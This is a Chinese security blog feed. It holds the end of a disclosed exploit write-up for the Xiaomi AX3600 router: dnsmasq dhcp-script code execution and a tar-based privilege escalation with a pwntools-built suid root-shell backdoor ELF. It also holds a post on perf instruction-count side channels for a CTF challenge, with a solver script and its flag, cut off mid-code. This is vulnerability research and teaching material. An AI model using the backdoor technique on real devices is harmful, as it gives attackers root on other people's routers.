src="../pic/Exploit-AX3600-using-logical-bugs/tftp.png" alt=""></p> </li> <li> <p>最终可以观察到 hackdes.sh 中的命令被执行 <img src="../pic/Exploit-AX3600-using-logical-bugs/rce.png" alt=""></p> </li> </ol> <p>这个漏洞的CVE编号是 <a href="https://privacy.mi.com/trust#/security/vulnerability-management/vulnerability-announcement/detail?id=15&amp;locale=zh">CVE-2020-11960</a></p> <p>上边两个漏洞连用，攻击者可以实现有限制的未授权代码执行（需要用户使用过备份配置的功能）</p> <h4 id="q--a">Q &amp; A</h4> <ul> <li>为什么使用 dhcp-script 选项的同时，要开启 tftp？ <ul> <li>触发 dhcp-script 需要一定的条件，通过 tftp 传输文件触发是一个很方便的方法</li> </ul> <blockquote> <p>-6 &ndash;dhcp-script=<!-- raw HTML omitted --> Whenever a new DHCP lease is created, or an old one destroyed, or a TFTP file transfer completes, the executable specified by this option is run. <!-- raw HTML omitted --> must be an absolute pathname, no PATH search occurs.</p> </blockquote> </li> <li>既然可以开启 tftp，能否可以通过 tftp 上传文件完成利用？ <ul> <li>不可以，dnsmasq 的 tftp 只能读取文件，不能上传文件</li> </ul> <blockquote> <p>The philosopy was to implement just enough of TFTP to do network boot, aiming for security and then simplicity. Hence no write operation: it&rsquo;s not needed for network booting, and it&rsquo;s not secure.</p> </blockquote> </li> <li>为什么不使用 dhcp-luascript? <ul> <li>AX3600 的 dnsmasq 不支持该选项</li> </ul> <blockquote> <p>root@XiaoQiang:~# dnsmasq &ndash;version Dnsmasq version 2.80 Copyright (c) 2000-2018 Simon Kelley Compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP no-DHCPv6 no-Lua TFTP no-conntrack ipset no-auth no-DNSSEC no-ID loop-detect no-inotify dumpfile</p> </blockquote> </li> </ul> <h3 id="漏洞三权限提升漏洞">漏洞三：权限提升漏洞</h3> <p>上述两个漏洞连用，攻击者已经可以未授权获得 root shell。出于安全研究的目的，我们多考虑了假设攻击者只拿到低权限的 shell，是否有可能通过漏洞进行权限提升，并最终找到了一个权限提升漏洞。</p> <p>漏洞产生的原因仍然和 <code>.tar.gz</code> 的解压有关，对于 <code>root</code> 用户而言，使用 <code>tar</code> 解压文件时，默认会保留文件的文件所有者，文件权限等信息</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback"> -p, --preserve-permissions, --same-permissions extract information about file permissions (default for superuser) --same-owner try extracting files with the same ownership as exists in the archive (default for superuser) </code></pre></td></tr></table> </div> </div><p>因此攻击者可以通过上传具有 <code>suid</code> 权限的后门程序到路由器文件系统中，低权限的攻击者通过执行后门来获取高权限的 shell。</p> <p>上传文件时对文件大小有限制，直接使用 C\C++ 等语言编写后门时，会超过最大限制。 <img src="../pic/Exploit-AX3600-using-logical-bugs/oversize.png" alt=""></p> <p>对于二进制选手而言，缩小可执行程序的体积就很简单了，如使用汇编写 binary 可以很大程度的缩小程序的体积，使用 pwntools 可以很方便的完成</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">context</span><span class="o">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s2">&#34;critical&#34;</span> <span class="n">context</span><span class="o">.</span><span class="n">binary</span> <span class="o">=</span> <span class="s2">&#34;./busybox&#34;</span> <span class="n">sc</span> <span class="o">=</span> <span class="n">asm</span><span class="p">(</span><span class="n">shellcraft</span><span class="o">.</span><span class="n">setresgid</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span> <span class="n">sc</span> <span class="o">+=</span> <span class="n">asm</span><span class="p">(</span><span class="n">shellcraft</span><span class="o">.</span><span class="n">setresuid</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span> <span class="c1"># execve(&#34;/bin/sh&#34;, [&#34;sh&#34;, NULL], NULL)</span> <span class="n">sc</span> <span class="o">+=</span> <span class="n">asm</span><span class="p">(</span><span class="n">shellcraft</span><span class="o">.</span><span class="n">pushstr</span><span class="p">(</span><span class="s2">&#34;/bin/sh</span><span class="se">\0</span><span class="s2">&#34;</span><span class="p">))</span> <span class="n">sc</span> <span class="o">+=</span> <span class="n">asm</span><span class="p">(</span><span class="s2">&#34;MOV X0, SP&#34;</span><span class="p">)</span> <span class="n">sc</span> <span class="o">+=</span> <span class="n">asm</span><span class="p">(</span><span class="n">shellcraft</span><span class="o">.</span><span class="n">pushstr</span><span class="p">(</span><span class="s2">&#34;sh</span><span class="se">\0</span><span class="s2">&#34;</span><span class="p">))</span> <span class="n">sc</span> <span class="o">+=</span> <span class="n">asm</span><span class="p">(</span><span class="s2">&#34;EOR X2, X2, X1&#34;</span><span class="p">)</span> <span class="n">sc</span> <span class="o">+=</span> <span class="n">asm</span><span class="p">(</span><span class="s2">&#34;MOV X14, X2&#34;</span><span class="p">)</span> <span class="n">sc</span> <span class="o">+=</span> <span class="n">asm</span><span class="p">(</span><span class="s2">&#34;STR X2, [SP, #-16]!&#34;</span><span class="p">)</span> <span class="n">sc</span> <span class="o">+=</span> <span class="n">asm</span><span class="p">(</span><span class="s2">&#34;ADD X1, SP, #16&#34;</span><span class="p">)</span> <span class="n">sc</span> <span class="o">+=</span> <span class="n">asm</span><span class="p">(</span><span class="s2">&#34;MOV X14, X1&#34;</span><span class="p">)</span> <span class="n">sc</span> <span class="o">+=</span> <span class="n">asm</span><span class="p">(</span><span class="s2">&#34;STR X1, [SP, #-16]!&#34;</span><span class="p">)</span> <span class="n">sc</span> <span class="o">+=</span> <span class="n">asm</span><span class="p">(</span><span class="s2">&#34;MOV X1, SP&#34;</span><span class="p">)</span> <span class="n">sc</span> <span class="o">+=</span> <span class="n">asm</span><span class="p">(</span><span class="s2">&#34;MOV X8, #221&#34;</span><span class="p">)</span> <span class="n">sc</span> <span class="o">+=</span> <span class="n">asm</span><span class="p">(</span><span class="s2">&#34;SVC #0&#34;</span><span class="p">)</span> <span class="n">f</span> <span class="o">=</span> <span class="n">make_elf</span><span class="p">(</span><span class="n">sc</span><span class="p">,</span> <span class="n">strip</span> <span class="o">=</span> <span class="bp">True</span><span class="p">,</span> <span class="n">extract</span> <span class="o">=</span> <span class="bp">False</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="n">f</span><span class="p">)</span> </code></pre></td></tr></table> </div> </div><p>最终体积生成符合要求的程序 <img src="../pic/Exploit-AX3600-using-logical-bugs/small_elf.png" alt=""></p> <p>并打包上传 <img src="../pic/Exploit-AX3600-using-logical-bugs/pack.png" alt=""></p> <p>这里需要注意，因为 <code>/tmp</code> 挂载的标志位为 <code>nosuid</code>，所以在 <code>/tmp</code> 下运行有 <code>suid</code> 权限的 binary 并不会生效 <img src="../pic/Exploit-AX3600-using-logical-bugs/nosuid.png" alt=""></p> <p>但可以上传 binary 至 <code>/tmp/spool/cron/crontabs</code> 即 <code>/etc/crontabs</code> 下实现通过 suid 提权 —— 这也是唯一一个突破点</p> <p><img src="../pic/Exploit-AX3600-using-logical-bugs/suid.png" alt=""></p> <p><img src="../pic/Exploit-AX3600-using-logical-bugs/lpe.png" alt=""></p> <p>这个问题在当前的AX3600中并不能称之为安全漏洞，因为AX3600中的所有进程都是以root权限运行的。但 <a href="https://sec.xiaomi.com/">MiSRC</a> 仍然承认了这个问题，并且额外为这个问题支付了漏洞奖金。</p> <h4 id="q--a-1">Q &amp; A</h4> <ul> <li>既然可以在 <code>/etc/crontabs</code> 下上传文件，为什么不在第二个漏洞的利用中直接上传定时任务脚本执行命令？ <ul> <li><code>/etc/crontabs</code> 下的定时任务脚本对文件名有要求，需和用户名一致才会被 crontab 视为合法的定时任务配置，如文件名必须为 <code>nobody</code> 才可以以 <code>nobody</code> 的身份执行命令。对于第二个漏洞中文件名部分可控的情况下，不满足利用条件</li> </ul> </li> </ul> <h2 id="后记">后记</h2> <p>在对AX3600路由器进行研究的过程中，我们发现了十余个逻辑漏洞，并获得了多个CVE编号，组合可以完成多套利用链，本文只分析了其中的一套利用链。如果读者对于其他的漏洞感兴趣，可以参考我们在HITCON 2020的议题 <code>Exploit (Almost) All Xiaomi Routers Using Logical Bugs</code>，在议题中，我们还会展示我们是如何从零开始解固件以及如何解密小米自定义的luac等细节。 扫描二维码可以下载议题slide： <img src="../pic/Exploit-AX3600-using-logical-bugs/qrcode.png" alt=""></p> <p>在提交 AX3600 相关漏洞的过程中，收到了 <a href="https://sec.xiaomi.com/">MiSRC</a> 迅速、专业的回复和支持，这里对 <a href="https://sec.xiaomi.com/">MiSRC</a> 表示感谢。</p> <h2 id="参考资料">参考资料</h2> <ul> <li><a href="https://zhuanlan.zhihu.com/p/26271959">实战栈溢出：三个漏洞搞定一台路由器</a></li> <li><a href="http://nginx.org/en/docs/http/ngx_http_core_module.html#alias">nginx alias</a></li> <li><a href="http://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2010q1/003558.html">[Dnsmasq-discuss] TFTP server - write requests</a></li> <li><a href="http://www.thekelleys.org.uk/dnsmasq/docs/dnsmasq-man.html">Man page of DNSMASQ</a></li> <li><a href="https://sec.xiaomi.com/">MiSRC</a></li> </ul> https://bash-c.github.io/post/perf-in-ctf/ Mon, 18 Nov 2019 00:22:17 +0800 https://bash-c.github.io/post/perf-in-ctf/ <h1 id="pin-in-ctf">pin-in-CTF</h1> <p>十几个月前，在学习 fuzz 时，我接触了 <a href="https://software.intel.com/en-us/articles/pin-a-dynamic-binary-instrumentation-tool">intel-pin</a> 这个动态插桩工具，当时发现对于一些 CTF reverse 题目，尤其是代码混淆比较严重的题目，可以编写 pintool 统计指令数等信息，多快好省的通过侧信道的方法逐位爆破出 flag，详见 <a href="http://m4x.fun/post/pin-in-ctf/">pin-in-ctf: blog</a>, <a href="https://github.com/bash-c/pin-in-CTF">pin-in-ctf: repo</a>。</p> <p>但这种方法缺点也很多:</p> <ul> <li>动态插桩使得程序的 runtime overhead 成倍增长(~%100)</li> <li>对于比较复杂的程序，尤其是系统调用较多的程序，内核态指令数会占总指令数的很大一部分，影响用户判断</li> <li>pintool 编写相对复杂</li> <li>只能对用户态的程序插桩，对内核态程序插桩需要较大的改动</li> </ul> <h1 id="intel-pt-and-perf">intel-pt and perf</h1> <p>半年前在做毕设时，我接触了 <a href="https://software.intel.com/en-us/blogs/2013/09/18/processor-tracing">intel-pt</a> 这个硬件级别的 trace 工具，其同样具有记录程序指令的功能，并且由于直接在硬件层面实现，runtime overhead 可以缩小到惊人的 5%，同时通过用户态的系统分析工具 <a href="https://perf.wiki.kernel.org/index.php/Main_Page">perf</a>，用户也可以相当方便的调用 intel pt 的某些功能。而 perf 也就是本篇文章要介绍的主角。</p> <p>前几个月的 oGeek 线上赛中，我有一道 pwn 一道 reverse 的出题任务，本来想打算用 intel-pt 的特性出一道逆向题，但因为时间紧张，构思尚不成熟，不想浪费想法，最终出了另外一道 NSIS script 的题目 <a href="https://github.com/bash-c/reverse_repo/tree/master/oGeekCTF2019_King%20of%20KOF_sourcecode">King of KoF</a>。在昨天的 ASIS Final 2019 的比赛中，遇到了一道题目 <a href="https://github.com/bash-c/reverse_repo/tree/master/ASIS_Final_2019_cursed_app">Cursed app</a>，分析之后觉得使用 perf 解决十分合适，于是终于有了分享 perf-in-ctf 这个想法（<del>并打理要长草的博客</del>）的机会，接下来进入正文。</p> <h2 id="perf">perf</h2> <p>perf 是 Linux 中分析性能的工具，具有很多强大的功能，详见 <a href="https://perf.wiki.kernel.org/index.php/Tutorial">linux perf turtorial</a>。本篇文章只对其统计指令数的用法进行介绍。</p> <p>首先需要安装，以 ubuntu 18.04 为例，直接使用包管理安装：</p> <blockquote> <p>sudo apt install linux-tools-common</p> </blockquote> <p>查看功能简介：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">~ perf --version perf version 5.0.21 ~ tldr perf perf Framework <span class="k">for</span> linux performance counter measurements. - Display basic performance counter stats <span class="k">for</span> a command: perf stat gcc hello.c - Display system-wide real <span class="nb">time</span> performance counter profile: sudo perf top - Run a <span class="nb">command</span> and record its profile into <span class="s2">&#34;perf.data&#34;</span>: sudo perf record <span class="nb">command</span> - Read <span class="s2">&#34;perf.data&#34;</span> <span class="o">(</span>created by perf record<span class="o">)</span> and display the profile: sudo perf report </code></pre></td></tr></table> </div> </div><p>这里只对 perf stat 功能进行介绍，参考 tldr 的例子，对 id 这个命令进行性能分析</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">~ sudo perf stat id <span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> Performance counter stats <span class="k">for</span> <span class="s1">&#39;id&#39;</span>: 1.71 msec task-clock <span class="c1"># 0.710 CPUs utilized</span> <span class="m">1</span> context-switches <span class="c1"># 0.584 K/sec</span> <span class="m">0</span> cpu-migrations <span class="c1"># 0.000 K/sec</span> <span class="m">122</span> page-faults <span class="c1"># 0.071 M/sec</span> 6,244,401 cycles <span class="c1"># 3.647 GHz</span> 2,353,996 instructions <span class="c1"># 0.38 insn per cycle</span> 459,910 branches <span class="c1"># 268.614 M/sec</span> 18,201 branch-misses <span class="c1"># 3.96% of all branches</span> 0.002412965 seconds <span class="nb">time</span> elapsed 0.000000000 seconds user 0.002342000 seconds sys ~ </code></pre></td></tr></table> </div> </div><p>其中有指令数这个结果</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">... 2,353,996 instructions <span class="c1"># 0.38 insn per cycle</span> ... </code></pre></td></tr></table> </div> </div><p>通过格式化输出简化显示</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">~ sudo perf stat -x : id <span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> 1.17:msec:task-clock:1167180:100.00:0.721:CPUs utilized 0::context-switches:1167180:100.00:0.000:K/sec 0::cpu-migrations:1167180:100.00:0.000:K/sec 121::page-faults:1167180:100.00:0.104:M/sec 4243048::cycles:1208711:100.00:3.635:GHz 2388158::instructions:1208711:100.00:0.56:insn per cycle 461917::branches:1208711:100.00:395.755:M/sec 18229::branch-misses:1208711:100.00:3.95:of all branches ~ </code></pre></td></tr></table> </div> </div><p>只保留 instructions 这一条结果</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">~ sudo perf stat -x : -e instructions id 1&gt;/dev/null 2359978::instructions:1819500:100.00:: </code></pre></td></tr></table> </div> </div><p>只保留用户态的结果</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">~ sudo perf stat -x : -e instructions:u id 1&gt;/dev/null 716210::instructions:u:1532634:100.00:: </code></pre></td></tr></table> </div> </div><p>看到这，看过 pin-in-CTF 的朋友可能已经知道怎么做了，接下来通过 ASIS Final 2019 的 <a href="https://github.com/bash-c/reverse_repo/tree/master/ASIS_Final_2019_cursed_app">Cursed app</a> 这个题目进行举例。</p> <h1 id="perf-in-ctf">perf-in-CTF</h1> <p><a href="https://github.com/bash-c/reverse_repo/tree/master/ASIS_Final_2019_cursed_app">binary here</a></p> <p>64 位 linux 程序，通过读文件验证结果</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">Desktop check ./cursed_app.elf ./cursed_app.elf: ELF 64-bit LSB shared object, x86-64, version <span class="m">1</span> <span class="o">(</span>SYSV<span class="o">)</span>, dynamically linked, interpreter /lib64/l, BuildID<span class="o">[</span>sha1<span class="o">]=</span>7c0031d8c259457ca7f3bab1c5a5f40269167b5f, stripped <span class="o">[</span>*<span class="o">]</span> <span class="s1">&#39;/home/m4x/Desktop/cursed_app.elf&#39;</span> Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled Desktop ./cursed_app.elf please locate license file, run ./app license_key Desktop <span class="nb">echo</span> <span class="s2">&#34;ASIS{&#34;</span> &gt; flag <span class="o">&amp;&amp;</span> ltrace ./cursed_app.elf ./flag _setjmp<span class="o">(</span>0x7ffc7e160590, 0x7ffc7e160758, 0x7ffc7e160770, 0x559e6789dbb0<span class="o">)</span> <span class="o">=</span> <span class="m">0</span> fopen<span class="o">(</span><span class="s2">&#34;./flag&#34;</span>, <span class="s2">&#34;r&#34;</span><span class="o">)</span> <span class="o">=</span> 0x559e68a2d260 fseek<span class="o">(</span>0x559e68a2d260, 0, 2, 0<span class="o">)</span> <span class="o">=</span> <span class="m">0</span> ftell<span class="o">(</span>0x559e68a2d260, 0x559e68a2d340, 0, 6<span class="o">)</span> <span class="o">=</span> <span class="m">6</span> fseek<span class="o">(</span>0x559e68a2d260, 0, 0, 0<span class="o">)</span> <span class="o">=</span> <span class="m">0</span> malloc<span class="o">(</span>6<span class="o">)</span> <span class="o">=</span> 0x559e68a2e4a0 fread<span class="o">(</span>0x559e68a2e4a0, 1, 6, 0x559e68a2d260<span class="o">)</span> <span class="o">=</span> <span class="m">6</span> fclose<span class="o">(</span>0x559e68a2d260<span class="o">)</span> <span class="o">=</span> <span class="m">0</span> puts<span class="o">(</span><span class="s2">&#34;Bummer! You got the wrong flag!!&#34;</span>...Bummer! You got the wrong flag!! <span class="o">)</span> <span class="o">=</span> <span class="m">33</span> +++ exited <span class="o">(</span>status 0<span class="o">)</span> +++ </code></pre></td></tr></table> </div> </div><p>根据题目描述</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">Description: If we want to say 100, should we start at 1 and count until 100? sha256(flag) = dd791346264fc02ddcd2466b9e8b2b2bba8057d61fbbc824d25c7957c127250d </code></pre></td></tr></table> </div> </div><p>已经可以猜到没必要逆清楚程序的整个逻辑。</p> <p>使用 IDA 分析程序，发现程序的逻辑很简单</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBgy1g91jwfxiahj30jl13oaam.jpg" alt="ida.png"></p> <p>读取文件内容后有多个判断，都通过才会执行到</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">.text:0000000000001F3B lea rdi, s ; &#34;Congratz! You got the correct flag!!&#34; .text:0000000000001F42 call _puts .text:0000000000001F47 mov [rsp+0F8h+var_F4] </code></pre></td></tr></table> </div> </div><p>简单调试了几个判断，发现是对文件内容的逐字节判断，因此必然每次输入的正确 flag 长度越长，程序执行的指令数就越多，可以利用这个特性用侧信道的方法得到 flag。</p> <p>先使用 perf 验证可行性，已经知道 flag 格式为 <code>ASIS{this_is_flag}</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">Desktop <span class="nb">echo</span> -n <span class="s2">&#34;0&#34;</span> &gt; ./license <span class="o">&amp;&amp;</span> perf stat -x : -e instructions:u ./cursed_app.elf ./license 1&gt;/dev/null 167612::instructions:u:1000300:100.00:: Desktop <span class="nb">echo</span> -n <span class="s2">&#34;1&#34;</span> &gt; ./license <span class="o">&amp;&amp;</span> perf stat -x : -e instructions:u ./cursed_app.elf ./license 1&gt;/dev/null 167614::instructions:u:1237218:100.00:: Desktop <span class="nb">echo</span> -n <span class="s2">&#34;2&#34;</span> &gt; ./license <span class="o">&amp;&amp;</span> perf stat -x : -e instructions:u ./cursed_app.elf ./license 1&gt;/dev/null 167614::instructions:u:967846:100.00:: Desktop <span class="nb">echo</span> -n <span class="s2">&#34;A&#34;</span> &gt; ./license <span class="o">&amp;&amp;</span> perf stat -x : -e instructions:u ./cursed_app.elf ./license 1&gt;/dev/null 167628::instructions:u:934691:100.00:: Desktop <span class="nb">echo</span> -n <span class="s2">&#34;A0&#34;</span> &gt; ./license <span class="o">&amp;&amp;</span> perf stat -x : -e instructions:u ./cursed_app.elf ./license 1&gt;/dev/null 167631::instructions:u:1034616:100.00:: Desktop <span class="nb">echo</span> -n <span class="s2">&#34;A1&#34;</span> &gt; ./license <span class="o">&amp;&amp;</span> perf stat -x : -e instructions:u ./cursed_app.elf ./license 1&gt;/dev/null 167629::instructions:u:1019846:100.00:: Desktop <span class="nb">echo</span> -n <span class="s2">&#34;A2&#34;</span> &gt; ./license <span class="o">&amp;&amp;</span> perf stat -x : -e instructions:u ./cursed_app.elf ./license 1&gt;/dev/null 167630::instructions:u:504064:100.00:: Desktop <span class="nb">echo</span> -n <span class="s2">&#34;AS&#34;</span> &gt; ./license <span class="o">&amp;&amp;</span> perf stat -x : -e instructions:u ./cursed_app.elf ./license 1&gt;/dev/null 167648::instructions:u:955516:100.00:: Desktop <span class="nb">echo</span> -n <span class="s2">&#34;AS0&#34;</span> &gt; ./license <span class="o">&amp;&amp;</span> perf stat -x : -e instructions:u ./cursed_app.elf ./license 1&gt;/dev/null 167645::instructions:u:914409:100.00:: Desktop <span class="nb">echo</span> -n <span class="s2">&#34;AS1&#34;</span> &gt; ./license <span class="o">&amp;&amp;</span> perf stat -x : -e instructions:u ./cursed_app.elf ./license 1&gt;/dev/null 167647::instructions:u:2748495:100.00:: Desktop <span class="nb">echo</span> -n <span class="s2">&#34;AS2&#34;</span> &gt; ./license <span class="o">&amp;&amp;</span> perf stat -x : -e instructions:u ./cursed_app.elf ./license 1&gt;/dev/null 167646::instructions:u:677381:100.00:: Desktop <span class="nb">echo</span> -n <span class="s2">&#34;ASI&#34;</span> &gt; ./license <span class="o">&amp;&amp;</span> perf stat -x : -e instructions:u ./cursed_app.elf ./license 1&gt;/dev/null 167664::instructions:u:564774:100.00:: </code></pre></td></tr></table> </div> </div><p>可以看到，当我们猜到下一位正确的 flag 时，指令数会有较为明显的增长（这里只保留用户态的 instructions 提高稳定性）。</p> <p>把上述过程封装为脚本，运行即可得到 flag</p> <p><a href="https://github.com/bash-c/reverse_repo/blob/master/ASIS_Final_2019_cursed_app/solve.py">exploit here</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="c1"># ASIS{y0u_c4N_s33_7h15_15_34513R_7h4n_Y0u_7h1nk_r16h7?__!!!}</span> <span class="kn">from</span> <span class="nn">subprocess</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">import</span> <span class="nn">string</span> <span class="kn">import</span> <span class="nn">sys</span> <span class="n">command</span> <span class="o">=</span> <span class="s2">&#34;perf stat -x : -e instructions:u ./cursed_app.elf ./license 1&gt;/dev/null&#34;</span> <span class="n">flag</span> <span class="o">=</span> <span class="s1">&#39;ASIS{&#39;</span> <span class="k">def</span> <span class="nf">write_file</span><span class="p">(</span><span class="n">cont</span><span class="p">):</span> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">&#34;./license&#34;</span><span class="p">,</span> <span class="s2">&#34;wb&#34;</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">cont</span><span class="p">)</span> <span class="n">write_file</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span> <span class="s1">&#39;&#39;&#39; </span><span class="s1">Desktop cat license </span><span class="s1">ASIS{ </span><span class="s1">Desktop perf stat -x : -e instructions:u ./cursed_app.elf ./license 1&gt;/dev/null </span><span class="s1">167689::instructions:u:377798:100.00:: </span><span class="s1">&#39;&#39;&#39;</span> <span class="n">ins_count</span> <span class="o">=</span> <span class="mi">167689</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="n">delta</span> <span class="o">=</span> <span 